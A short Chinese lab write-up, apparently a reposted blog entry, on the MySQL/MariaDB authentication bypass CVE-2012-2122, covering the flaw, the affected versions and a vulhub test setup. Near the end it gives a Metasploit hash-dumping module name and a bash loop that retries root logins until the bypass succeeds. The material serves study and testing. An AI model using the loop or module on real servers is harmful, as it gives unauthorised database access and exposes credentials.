Mysql 身份認證繞過漏洞(CVE-2012-2122)


參考連接:

https://www.freebuf.com/vuls/3815.html

當連接MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。 也就是說只要知道用戶名,不斷嘗試就能夠直接登入SQL數據庫。按照公告說法大約256次就能夠蒙對一次。而且漏洞利用工具已經出現

受影響版本:

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

環境搭建: vulhub https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122

環境啟動后,將啟動一個Mysql服務(版本:5.5.23),監聽3306端口,通過正常的Mysql客戶端,可以直接登錄的,正確root密碼是123456。

使用msf掃描模塊

auxiliary/scanner/mysql/mysql_authbypass_hashdump

或者

for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.230.131 2>/dev/null; done


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM